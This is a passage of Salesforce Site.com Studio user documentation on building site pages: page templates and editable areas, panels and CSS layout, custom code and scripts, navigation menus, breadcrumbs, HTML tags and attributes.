Editable Page Elements and User Roles

• Site administrators and designers can edit any page element you make editable.
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• Contributors can modify editable content blocks in site pages based on the template. They can also edit content blocks
that you place in an editable panel in template-based site pages. To add a content block that only other site administrators
or designers can edit, use custom code instead.

See Also:
Working With Default Content in Editable Page Elements
Creating Editable Template Areas
Editing and Working With Site.com Page Elements

Working With Default Content in Editable Page Elements
Content added to an editable area on a page template becomes default content for the area in child pages and templates.

Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:

The content of all editable page elements on a child page or template is linked to the content of the editable elements on its
parent page template. When you update the content of an editable page element on the parent template, the changes are
pushed down to any child pages or page templates. However, if you modify the content of an editable page element at the
child page or template level, you break the link between the elements, and any subsequent changes made to the page element
on the parent template won't trickle down to its children.

• To replace the inherited content of an editable page element, select it on the page or in the Page Structure pane and click
 > Override Parent Content.

Any changes made to the element at the parent level will no longer show up.
• To return control of the content to the parent template, select the editable page element on the page or in the Page Structure

pane and click  > Revert to Parent Content.
When you do this, any custom content in the editable page element is lost.

Disabling the Editable property of a panel in a parent template overrides any changes made to that panel in child pages or
templates. Changes to the panel at the child level disappear, and the panel reflects only the content from the parent template.
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However, the changes at the child level aren’t lost. Re-enabling the Editable property of the panel in the parent template
restores the custom content previously added to its children.

See Also:
Creating Editable Template Areas
Tips for Working With Editable Page Elements
Editing and Working With Site.com Page Elements

Creating Site.com Pages
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:

As a site administrator or designer, when you create a site page, you can choose to base it on a page template. If you're creating
several site pages that have common page elements, such as a navigation menu, you can save time and effort and achieve a
consistent look and feel by creating a page template first and then basing your site pages on it. Alternatively, if none of your
site pages have a similar structure or if you need to create a one-off site page that doesn't follow the overall site design, such
as a home page, you can create a page based on a basic layout.

Creating Site Pages from a Layout

Start from scratch with a completely blank page or use a basic page layout.

1. Hover over Site Pages on the Overview tab and click New, or click New > Site Page when the Site Pages view is open.
2. Enter the site page name. Page names can’t include spaces or special characters, such as #, ?, or @.
3. Click Layouts and select either a blank page or a predefined page layout, such as a page with a header and footer.

Note:  Predefined page layouts use panels to create columns, headers, and footers. These panels use inline CSS
to set their position, so you can easily modify the layout after the page is created. However, if you're familiar with
CSS and prefer using CSS rules, you can remove the inline style by selecting the panel, deleting the code from
the Code tab in the Style pane, and clicking Apply.

4. Choose a layout mode:

• To expand the page to fill the width of the browser window, click Full width.
• To set the page width, click Fixed width and enter the width.

5. Click Create. The site page opens.
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Creating Site Pages from a Page Template

If you created a page template, you can base your site pages on it.

The quickest option is to:

1. Select the template in the Page Templates view and click  > Create Page from Template. Alternatively, click Page
Actions > Create Page from Template if the template is open.

2. Enter the site page name. Page names can’t include spaces or special characters, such as #, ?, or @.
3. Click Create. The site page opens.

Alternatively:

1. Hover over Site Pages on the Overview tab and click New, or click New > Site Page when the Site Pages view is open.
2. Enter the site page name. Page names can’t include spaces or special characters, such as #, ?, or @.
3. Click Page templates and select the page template.
4. Click Create. The site page opens.

Tip:  You can also create pages by converting or duplicating other pages.

See Also:
Understanding the Page Editing View in Site.com Studio
Adding Site.com Page Elements

Identifying Which Template a Site.com Page Uses
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:

When you edit a template-based page, you can't modify its non-editable page elements. You also can't reposition, resize, or
delete editable page elements, or alter the events, properties, or style associated with them. To update these elements or
properties, you must edit them in the template the page is based on.

To identify which page template a site page is based on:

• Hover over the site page in the Sites Pages view on the Overview tab. An information popup appears that displays the
page template's name.
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• Examine the Page Structure pane when the page is open. The template's name is displayed as a link that you can click to
open the template.

Tip:  To view and open the site pages associated with a particular page template, select or hover over the page template
in the Page Templates view of the Overview tab and click  > Edit Pages Based on Template. Click a listed site
page to open it.

See Also:
Creating Site.com Page Templates
Site.com Page Templates Overview
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Performing Common Page Actions
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:

When working with pages and templates, you can perform common tasks, such as renaming, deleting, or duplicating pages.

To access more page options, select or hover over a page on the Site Pages view of the Overview tab and click .

To access more template options, select or hover over a template in the Page Templates view of the Overview tab and click
.

Alternatively, if the page or template is open, click Page Actions.

The available options vary for pages and templates:

To...Select

Change the page into a template.Convert Site Page to Template

Change the template into a page. You can't convert a template that has pages based on
it.

Convert Template to Site Page

Create a child template based on the selected template.Create Child Template

Create a page based on the template.Create Page from Template

Remove a page or template. You can't delete a template that has pages based on it.Delete

Create a copy of the page or template.

Duplicating a page template doesn’t duplicate the pages or templates based on it.

Duplicate

Open the page or template for editing. Alternatively, double-click the page or template.Edit

View and open the site pages that are based on the selected page template.Edit Pages Based on Template

View the page in a browser window.Preview

3331

Performing Common Page ActionsCreating Websites



To...Select

Change the page or template name.Rename

See Also:
Understanding the Page Editing View in Site.com Studio
Using Site.com Studio as a Site Administrator or Designer

Changing a Page’s Doctype Property
The Document Type Definition (DTD) or doctype of a page defines which version of HTML it’s using. This information is
used by some browsers to trigger a standard rendering mode. By default, each page’s doctype is set to XHTML 1.0, but you
can change it to HTML5.

Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:

When the page is open:

1. Select the page in the Page Structure pane.
2. In the Properties pane, select an option in the Doctype drop-down list.

See Also:
Changing a Page Element’s HTML Tag
Adding Custom HTML Attributes
HTML5 Semantic Page-Layout Tags
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ADDING FEATURES AND PAGE ELEMENTS

Site.com Page Elements
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

Page elements are the building blocks of your site pages and page templates. Combined, they provide the page's structure and
content.

When a site page or page template is open in Site.com Studio, these page elements are available to site administrators and
designers:

DescriptionPage Element

Contains the page text, and can also house images, media, and
hyperlinks.

Content Block

Lets you customize your site by adding markup, such as
HTML and JavaScript for elements that aren't provided in
Site.com Studio.

Custom Code

Adds images directly to the page.Image

Adds a breadcrumb navigation element to the page.Breadcrumb

Creates a menu that lets users navigate through the pages of
your site.

Menu

Adds structure to the page and lets you group other page
elements together.

Panel

Adds a button to the page. You can use the actions in the
Events pane to add functionality to the button.

Button

Lets you create web-to-lead forms or gather customer
feedback, and submit the data to Salesforce objects.

Form

Provides several field types to add to forms or pages. When
added to a form, binds to fields in the form’s object. See Input
Field Types on page 3394.

Input Fields

Must be contained in a data repeater. Binds to a field in the
data repeater’s object and acts as a placeholder that shows the
content of a specified field for the current record.

Data Element

Connects to a standard or custom Salesforce object, performs
calculations on the returned results, and displays the calculation
on the page.

Data Function
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DescriptionPage Element

Connects to a Salesforce object and returns a dataset based on
filters that you specify. Combines with data elements or custom
code page elements to display the results on the page.

Data Repeater

Connects to a standard or custom Salesforce object, retrieves
a data set based on the filter criteria that you specify, and
displays one or more record as rows in the table.

Data Table

See Also:
Adding Site.com Page Elements
Editing and Working With Site.com Page Elements

Adding Site.com Page Elements
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:

Page elements are the building blocks of your site pages and page templates. Panel elements add structure to your pages. You
can think of both pages and panels as “containers” for the page elements that you add to them.

If a site page or page template is based on another page template, you can only add page elements to editable panels, which
are highlighted with a blue border on the page.

Pages, panels, data repeaters, and forms are “container” page elements, so you can add other page elements to them when the
page is open.

• In the Page Elements pane, either:

◊ Drag the page element onto the page canvas or container page element.

◊ Click the page element, select where to place it in the popup that appears, and click Apply.

• In the Page Structure pane, hover over a container page element and click  > Add Page Elements. Click the item you
want to add or drag it onto the container page element.

• Select a container page element on the page and click  > Add Page Elements. Click the item you want to add or drag
it into the container page element.
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When you drag a page element into an editable panel, the page element displays a permitted icon and a green border shows
where you're placing the element.

If you try dragging a page element into a panel that isn't editable, the page element displays a not-permitted icon.

See Also:
Editing and Working With Site.com Page Elements
Adding Images Directly to the Page
Adding Content Blocks to Pages
Adding Custom Code to Pages
Adding a Navigation Menu

Editing and Working With Site.com Page Elements
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:

The Page Structure ( ) pane displays the hierarchy of all elements on the page and is a very useful way of selecting, moving,
and reordering elements, particularly for more complicated page designs.

• To select a page element, either click it on the page, or select it in the Page Structure pane. This highlights the element

on the page and displays the item's selector bar and Actions menu ( ).
• To edit a page element, such as a content block, image, or custom code, either:

◊ Double-click the element on the page.

◊ Select the element on the page and click  > Edit on its selector bar.
◊ Select or hover over the element in the Page Structure pane and click  > Edit.
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◊ Click Edit Content on the toolbar (for content blocks only).

• To move a page element, either:

◊ Select the element on the page and drag it to the correct position, or click  > Move on its selector bar.
◊ Drag the item to your preferred location in the Page Structure pane, or select it and click  > Move > Direction.

You can also drag all page elements other than panels to your preferred location in the Page Structure pane.

• To resize a page element, select it and drag the resize handles to the correct size. If the corner resize handles are grayed
out, it means the item's Auto Height property is enabled, which adjusts the height depending on its contents. To resize
it to a set height, disable the property by either deselecting Auto Height in the Properties pane, or by clicking one of the
bottom resize handles and clicking Disable Auto Height in the popup message that appears.

Tip:  If you disable the Auto Height property on an image, but you want it to retain its aspect ratio—the relationship
of height to width—press and hold down the SHIFT key while you drag to resize it.

Alternatively, if you're using CSS to style the page element, adjust the style of the class or ID that styles it.

• To delete an element, select it and either:

◊ Click  > Delete on the item's selector bar.
◊ Press DELETE.

◊
Click  on the toolbar.

◊ In the Page Structure pane, click  > Delete.

If a site page or page template is based on another page template:

• The content of all editable page elements on a child page or template is linked to the content of the editable elements on
its parent page template. When you update the content of an editable page element on the parent template, the changes
are pushed down to any child pages or page templates. However, if you modify the content of an editable page element at
the child page or template level, you break the link between the elements, and any subsequent changes made to the page
element on the parent template won't trickle down to its children.

• You can't reposition or resize its page elements. However, if the element's Auto Height property is enabled in the template,
the height will adjust to fit the content in the template-based page. To edit the page element, you must edit it in the page
template.

• You can't delete its page elements. To delete the page element, you must delete it from the page template.

• You can't alter the events, properties, or style of an editable page element, such as its color, position, and size.

See Also:
Site.com Page Elements
Adding Site.com Page Elements
Adding Content Blocks to Pages
Laying Out Site.com Pages Using Panels
Tips for Working With Editable Page Elements
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WORKING WITH PANELS

Laying Out Site.com Pages Using Panels
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:

A panel is a useful layout tool that defines the logical divisions of your page and lets you group page elements together for easy
movement and positioning. Think of it as a container for other page elements, including other panels, or as a div that wraps
around the content placed within it. Panels are ideal for adding editable areas to page templates.

When you create a page template or site page, you can use predefined page layouts that include headers, footers, and columns,
which are created using panels. Once created, you can then further modify the layout to match your site's design.

If you need to add more divisions to the page and you're not familiar with CSS, the easiest method is to use row and column
panels. This feature adds panels with predefined CSS positioning to ensure they align correctly on the page.

Note:  Predefined page layouts, and row and column panels use inline CSS to set their position. If you're familiar
with CSS and are using CSS rules to style your site, you can remove the inline CSS by deleting it from the Code tab
in the Style pane and clicking Apply.

To add row and column panels to a page:

1. Select the page (the top folder icon) in the Page Structure pane.

2. Click  > Add Rows and Column Panels.
3. Select the number of row or column panels you require. If the page already contains content, it is placed in the first new

panel.

To add a row panel:

• Above a panel, select the panel on the page or in the Page Structure pane and click  > Add Rows and Column Panels
> Insert Row Above

• Below a panel, select the panel on the page or in the Page Structure pane and click  > Add Rows and Column Panels
> Insert Row Below

To add row and column panels to another panel:
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1. Select the panel on the page or in the Page Structure pane.

2. Click  > Add Rows and Column Panels.
3. Select the number of row or column panels you require. If the page already contains content, it is placed in the first new

panel.

To add a single panel, drag a Panel from the Page Elements pane onto the page.

By default, the height of a panel automatically adjusts when you add content to it because its Auto Height property is enabled.
You can disable the property to resize and reposition panels. If you hover over a panel on the page, an information popup
appears that displays the width and height of the panel.

When you drag a page element onto a panel, the edges change color, indicating that the element is now grouped within it.
To remove the element from the group, drag it outside the panel.

See Also:
Adding Site.com Page Elements
Positioning Panels Using CSS
Changing a Page Element’s HTML Tag

Positioning Panels Using CSS
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:

A panel is a useful layout tool that defines the logical divisions of your page. Using CSS, you can position panels and improve
the layout of the page.

Adding Padding and Margins to Panels

Two CSS properties—margins and padding—can help with your page layout by creating space between the rows and columns,
and the content within. The margin property controls the space outside the panel between its border and outer edge, while
the padding property controls the space between the panel's content and border.
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To add margins and padding:

1. Select the panel.
2. Open the Dimensions section of the Style pane.
3. In the Margins section, either:

• Set the margin width for all four sides by entering a value in the All text box and selecting the unit of measurement.
• Set the margin widths for the top, right, bottom, or left sides independently by entering a value in the appropriate text

box and selecting the unit of measurement.

4. Similarly, in the Padding section, set the padding widths as required. Adding padding increases the total width of the
panel. For example, if you have a panel with a width of 500px and you add padding of 20px to all sides, the total width of
the panel will be 540px.

Tip:  You can center a panel or block page element using the margin property. Enter 0 in the All text box and select
Auto in the drop-down list.

Creating Column Panels Using the Float Property

If you need to add more divisions to the page and you're not familiar with CSS, the easiest method is to use row and column
panels. Alternatively, using the CSS float property, you can position panels to the left or right to create columns. (When you
add panels using the row and column panels feature, they're automatically positioned using the float property.) For example,
you could add two single panels to a container panel and set both panel's float and width properties to create a two-column
page layout.

To create a column panel:

1. Select the panel.
2. Open the Layout section of the Style pane.

3. Click  to float the panel to the left, or click  to float the panel to the right. If you're creating a two-column
layout, for example, ensure you set the float property of both panels.

4. Adjust the width of the panel to ensure the panels align correctly by either setting the width in the Dimensions section or
dragging the panel's border on the page. For example, if you're creating two columns of equal width, set the width of both
panels to 50%.

Tip:  When you use the float property, remember to set the overflow property of the container panel to “hidden.”
This allows the container panel to grow as the height of the column panels increase. Select the container panel and
in the Layout section of the Style pane, select Hidden in the Overflow drop-down list.

See Also:
Cascading Style Sheets Overview
Laying Out Site.com Pages Using Panels
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Adding Images Directly to the Page
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:

As a site administrator or designer, you can add images directly to your site pages and page templates or you can add them to
content blocks.

To add an image directly to the page:

1. Open the site page or page template.
2. Drag an Image from the Page Elements pane onto the page.
3. In the Add an Image dialog box, either:

• Find an existing image by typing its name in the Search Image text box and selecting it from the list.
• Upload an image from your computer by opening the Upload tab, browsing to the image, clicking Upload, and selecting

it from the list.

4. Click Apply. The image is added to the page.
5. Enter a brief description of the image in the Alternative Text field in the Properties pane. The description is used

by screen reader users or as a substitute if the image doesn't display. It can also help with search engine optimization (SEO).

See Also:
Adding Site.com Page Elements
Editing and Working With Site.com Page Elements
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Adding Content Blocks to Pages
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:

Content blocks contain the text of your website pages, and can also house images, videos, and hyperlinks. Content blocks are
the only page element that contributors can edit and modify on a site page.

To add a content block, either drag it from the Page Elements pane onto the page or target a container page element.

To edit a content block, double-click it or click Edit Content. For greater control over the text, you can edit the HTML
directly by selecting the content block and clicking  > Edit HTML.

To add a content block that only other site administrators or designers can edit, use custom code instead.

See Also:
Adding Images to Content Blocks
Attaching Hyperlinks to Text and Images

Adding Custom Code to Pages
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:

Custom code lets you customize your site using markup, such as HTML and JavaScript.
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• Add markup to a specific location on a page using the Custom Code page element. JavaScript added using the Custom
Code page element loads when that part of the page loads.

• Add markup to the page head. JavaScript in the page head loads first.

• Add JavaScript to the page body on page 3342. JavaScript added to the page body is positioned at the end of the body tag
and only loads when the DOM is ready.

• Add a reference to a JavaScript file or library on page 3342 in the page head or body.

Tip:

• Scripts can't execute while you're editing a page in Site.com Studio. To test your code, preview the page.

• If you are building a Site.com site from an existing HTML site, avoid using the Custom Code page element to
paste large chunks HTML from the original site. Instead, use the available page elements, such as panels, content
blocks, and data tables. This will let you make future updates and design changes much more easily.

Adding Markup Directly to the Page

1. Drag a Custom Code page element from the Page Element pane onto the page.
2. Enter the code in the Edit Code dialog box.
3. Click Save and Close to add the code directly to the page.

Adding Markup to the Page Head

1. In the Scripts section of the Properties pane, click Configure in the Edit Head Markup section.
2. Enter the markup in the Edit HTML Code dialog box.
3. Click Save and Close to insert the markup into the page head.

Adding JavaScript to the Page Body

1. In the Scripts section of the Properties pane, click Configure in the Edit Body Scripts section.
2. Enter the code in the Edit JavaScript Code dialog box. Don't add <script> tags, as they're already included.
3. Click Save and Close to add the code to the bottom of the page body.

Using JavaScript Files or Libraries

Instead of adding JavaScript code directly to a page, you can include links to imported or external JavaScript files, or to an
open-source library (via the Google Libraries API).

1. In the Scripts section of the Properties pane, click  in either the Body Scripts or the Head Scripts section.
2. To link to:

• A JavaScript file that you've imported, select An imported script and select the file.
• An open-source JavaScript library, select A Google AJAX library and select the library.
• An external JavaScript file, select A URL to an external script and enter the address.

3. Click Apply.

See Also:
Displaying Data Using Custom Code
Adding Site.com Page Elements
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ADDING WEBSITE NAVIGATION

About the Site Map and Page Hierarchy
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

The Site Pages view on the Overview tab contains the pages and site map links of your website. The Site Map folder reflects
the hierarchy or tree structure of your site by housing site pages and links that are included in the site map. When you create
new pages or site map links, they're automatically added to this folder. The Landing Pages folder houses standalone pages
that are excluded from the site map, making it ideal for temporary pages, such as promotional or competition pages.

Tip:  If you can’t see the Site Map folder in the Site Pages view on the Overview tab, click .

When adding a navigation menu to your site, it's important to organize the hierarchy of your site pages and links accurately,
because this structure is used to generate the menu. Pages and site map links are displayed in navigation menus in the order
you arrange them.

In this representation of the site hierarchy, you can more clearly see the tree structure.

1. The Site Map folder, which contains four site pages.
2. A top-level page in the site hierarchy.
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3. A top-level, parent page with two child pages. A child page is a page at a lower level in the site hierarchy than its parent
page.

4. Two child pages.
5. The Landing Pages folder, which contains a temporary page that's not part of the site map or navigation menu.

Tip:  If a page has child pages, the  icon appears beside it indicating that you can expand the branch.

By default, when you create a menu, it’s generated from the pages and site map links in the Site Map folder in the Site Pages
view. However, you can also create a menu that’s generated from the pages in the Landing Pages folder or from the child or
sibling pages of a site page.

You can hide a page in menus, breadcrumbs, and the site map by selecting the Hide Page checkbox found on the Properties
pane for each page. This setting also prevents website visitors from accessing the page’s direct URL. By default, all pages are
visible.

See Also:
Adding a Navigation Menu
Creating Site.com Pages

Adding Links to a Site Map
Pages aren’t the only things you can assign to your site map. Add internal or external URLs to your site map to customize
your navigation menus and breadcrumbs, and achieve greater flexibility and control.

Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:

For example, let’s say you have a top-level Products page that has a menu based on its child pages. You also want to include
a page called Testimonials in the menu, but it’s not a child page of the Products page. You can create a site map link that
points to the Testimonials page and add the link under Products in the site map. Now when visitors view the Products page,
they see a menu consisting of its child pages, along with a menu item that takes them directly to Testimonials.

1. On the Overview tab, click New > Site Map Link.
2. Enter a name for the link.
3. Enter a URL. URLs can be either relative or absolute, and are case sensitive.
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Note:  You can’t preview absolute site map links in Site.com Studio unless they include a prefix, such as http://
or https://.

4. Click Create.
The link appears at the bottom of the site map.

5. Drag the link to the correct position in the site map.

Note: Site map links are automatically included in navigation menus and breadcrumbs. However, you can’t set a site
map link as a custom root node in a breadcrumb.

See Also:
Adding Breadcrumb Navigation to Pages
Adding a Navigation Menu
About the Site Map and Page Hierarchy

Adding Breadcrumb Navigation to Pages
Add a Breadcrumb page element to your page to help users navigate through your site and show the page’s location in the site
hierarchy.

Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:

Breadcrumb navigation is based on the pages and links in the site map and usually supplements menu navigation. You can
hide a page in menus, breadcrumbs, and the site map by selecting the Hide Page checkbox found on the Properties pane for
each page. This setting also prevents website visitors from accessing the page’s direct URL. By default, all pages are visible.

Tip:  To save time and effort, add a Breadcrumb page element to a page template to automatically include it on every
template-based site page. The breadcrumb on each derived page dynamically updates based on its location in your
site map.

1. Open the page or page template that you want to add the breadcrumb element to.
2. Drag a Breadcrumb from the Page Elements pane onto the page.
3. In the Properties pane, under Root, specify a custom root node for the breadcrumb. By default, the root value is set to

None, which builds the breadcrumb structure based on the page’s location in the site map.
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• Select Home Page to set the site’s home page as the first item in the breadcrumb. To find out how to set a site’s home
page, see Configuring Site Properties.

• Select a specific site page to set it as the first item in the breadcrumb.

Note:  You can’t set a site map link as a custom root node in a breadcrumb.

4. In the Properties pane, under Separator, you can customize the separator used between breadcrumb nodes.

By default, the separator is >. However, you can change it to another text symbol or insert HTML code for an image in
your site, such as <img src='/separatorimage.jpg'/>.

5. To style the breadcrumb:

a. Click the Style pane and ensure Class is selected.
b. Choose an option from the Style drop-down list.
c. Adjust the values in the Visual tab as desired.

See Also:
Adding a Navigation Menu
Editing and Working With Site.com Page Elements

Adding a Navigation Menu
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:

By default, when you create a menu, it’s generated from the pages and site map links in the Site Map folder in the Site Pages
view. However, you can also create a menu that’s generated from the pages in the Landing Pages folder or from the child or
sibling pages of a site page.

1. Arrange site pages and site map links in the Site Map folder or the Landing Pages folder in the order you want them to
appear in the menu by dragging them to the desired location. Drag a page or site map link onto another page or link to
make it a child of that item. Drag pages or links into the Landing Pages folder to exclude them from the site map.
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Tip:  If you can’t see the Site Map folder in the Site Pages view on the Overview tab, click .

2. Open the page template or site page that you want to add the navigation menu to.
3. Drag a Menu from the Page Elements pane onto the page.
4. In the Properties pane, under Menu Source, select the pages that you want to use for the menu. By default, the Site Map

folder is used to create the menu. Any site map link in the applicable hierarchy also shows up in your menu.

• Select Landing Pages to create the menu from the pages in the Landing Pages folder.
• Select Child Pages to create the menu from the current page’s child pages.
• Select Sibling Pages to create the menu from all of the pages that share the same parent as the current page.
• Select a specific site page to create the menu from just its child pages.

Note:  If you add a menu element to a page template, the menu doesn’t display correctly in the template if you
select Child Pages or Sibling Pages as the menu source, because page templates aren’t part of the site
map hierarchy. However, the menu appears as expected on site pages based on the page template.

5. To alter the appearance of the menu, you can select a different theme from the Theme Name drop-down list. For example,
to create a drop-down menu, select Horizontal Drop-down. You can modify the style of any theme to suit your needs.

6. To change the name of a page in the menu, open the associated page and update its Navigation Name field in the
Properties pane. Navigation names can include spaces and special characters.

Alternatively, to change the name of a site map link in your menu, hover over the link in the Site Pages view on the
Overview tab, click Edit, and update the name.

Tip:

• When you add a new page or site map link, update a page’s Navigation Name property, or rearrange pages or
links, the menu updates automatically to reflect the changes.

• To automatically include a menu on every site page, add the menu to a page template and base the site pages on
it.

• You can hide a page in menus, breadcrumbs, and the site map by selecting the Hide Page checkbox found on
the Properties pane for each page. This setting also prevents website visitors from accessing the page’s direct URL.
By default, all pages are visible.

See Also:
Styling Navigation Menus
About the Site Map and Page Hierarchy
Adding Site.com Page Elements
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Styling Navigation Menus
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:

Navigation menus are styled using CSS themes that you can customize to match the design of your website. When you add
a navigation menu to a page, it uses a default theme to control its appearance. Choose from other existing themes in the Theme
Name drop-down list in the Properties pane.

Alternatively, to customize a theme to suit your needs:

1. Select the navigation menu on the page.
2. Select a theme to use as a base in the Theme Name drop-down list in the Properties pane. Use a theme that most closely

matches your site design or select Blank to start with a completely blank theme.
3. Open the Style pane and ensure Class is selected.
4. In the Style drop-down list, select the part of the menu that you want to style. When you select an item, it's highlighted

for a few seconds, so you can easily see which part you're styling.

Tip:  If you're familiar with CSS, you can also modify the style of the menu in the site's style sheet.

5. To style the selected menu item, use the Style pane properties. Your changes are immediately reflected in the menu.
6. Repeat as required for each part of the menu.

See Also:
Adding a Navigation Menu
About the Site Map and Page Hierarchy
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Adding Custom HTML Attributes
You can add custom HTML attributes to pages and page elements, which are rendered on the HTML tag of the page element.
For example, this is useful when working with third-party frameworks that render page elements differently based on certain
attributes.

Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:

When the page is open:

1. Select the relevant page or page element in the Page Structure pane.

2. In the HTML Attributes section of the Properties pane, click .
3. Enter a name and value for the HTML attribute.
4. Click Save.

To delete an HTML attribute, select it and click .

To change the order in which an HTML attribute is rendered, select it and click  or .

See Also:
Changing a Page Element’s HTML Tag
HTML5 Semantic Page-Layout Tags
Changing a Page’s Doctype Property

Changing a Page Element’s HTML Tag
By default, panels, data repeaters, data elements, custom code, and content blocks are each defined as a div, but you can
change this to any other HTML tag using the HTML Tag property. This gives you greater flexibility and control over how
the page element is displayed on the page.

Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition
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User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned in Site.com Studio

To edit page element properties:

Warning:  The HTML Tag property provides a powerful way to control how page elements are displayed. However,
if you change a page element’s HTML tag, you may generate invalid HTML. Before publishing any changes, test
the page thoroughly.

To redefine a panel, data repeater, data element, custom code, or content block:

1. Select the element on the page.
2. In the HTML Tag field in the Properties pane, start typing the tag name.
3. In the auto-complete list that appears, select the relevant HTML tag. Alternatively, you can define your own HTML

tag—for example, if you’re working with a JavaScript library or if new HTML5 tags are introduced in the future. You can
also remove the HTML tag on a panel, data repeater, data element, custom code, or content block to disable its ID, class,
or inline styles.

Note:  The following tags aren't included in the auto-complete list:

• base

• body

• doctype

• head

• html

• meta

• style

• title

See Also:
HTML5 Semantic Page-Layout Tags
Adding Custom HTML Attributes

HTML5 Semantic Page-Layout Tags
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

HTML5 defines several semantic page-layout tags that describe the content they contain. These tags make it easier for search
engines and screen readers to read and organize your content.
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By default, several page elements are defined as a div, including panels, data repeaters, data elements, content blocks, and
custom code. Using a page element’s HTML Tag property, you can change the tag to a semantic HTML5 block tags, such as:

DescriptionOption

A section containing an independent item of content, such as
a magazine article or a forum post.

Article

A section containing content that’s only superficially related
to the main page content, such as a sidebar or advertising.

Aside

A section containing additional details that the user can view
or hide using an interactive widget. It can also include a
summary section.

Details

A section containing an introduction, or a group of navigation
elements.

Header

A footer section for the page or parent section. It typically
contains information about the parent section and appears at
the end of the section.

Footer

A section that contains navigation links.Nav

A generic section of the page.Section

A summary or caption section for a details section.Summary

Tip:  If you use a HTML5 semantic tag, it’s good practice to also change the page’s doctype to HTML5.

See Also:
Changing a Page Element’s HTML Tag
Adding Custom HTML Attributes

STYLING YOUR WEBSITE

Cascading Style Sheets Overview
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

Cascading Style Sheets (CSS) provide a flexible way to add style to the pages of your website. This collection of formatting
rules governs the appearance of your pages, and lets you define the fonts, colors, layout, and other presentation features.
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By using CSS to control your fonts, you can ensure greater consistency in the appearance and layout of your pages in multiple
browsers. Some of the many text properties that CSS lets you control include font family and size, text and background color,
text formatting, and link color.

Using CSS, you can also position, add color to, float text around, and set margins and borders for block-level elements. A
block-level element is a standalone piece of content that's visually formatted as a block. For example, content blocks (which
are equivalent to p tags) and panels (which are the same as div tags) are both block-level elements.

Site.com supports CSS3, which is the latest specification for CSS.

About Inline Styles Versus Style Sheets

In Site.com Studio, you can:

• Apply styles directly to a selected page or page element using the Inline option in the Style pane. Inline styles apply only
to the selected item.

• Add style items such as CSS classes or IDs to a style sheet, and apply the style items to the selected page or page element.
This approach separates the content (your web pages) from the presentation (the style sheet).

If you’re not familiar with CSS, you’ll probably find the inline option the easiest to use and understand. However, inline styles
lose many of the advantages of style sheets because they mix content with presentation—the inline style is only applied to that
individual element. If you need to update the style of your site, you have to update the style properties of every affected page
and page element.

By contrast, although style sheets may be more difficult to understand at first, they enable you to make site-wide changes from
one convenient location. When you update a style item in your style sheet, it immediately updates the style of every page or
page element that uses it.

It’s worth taking the time to become familiar with CSS because it:

• Saves you time and effort when building and designing your site
• Produces cleaner, more consistent site designs
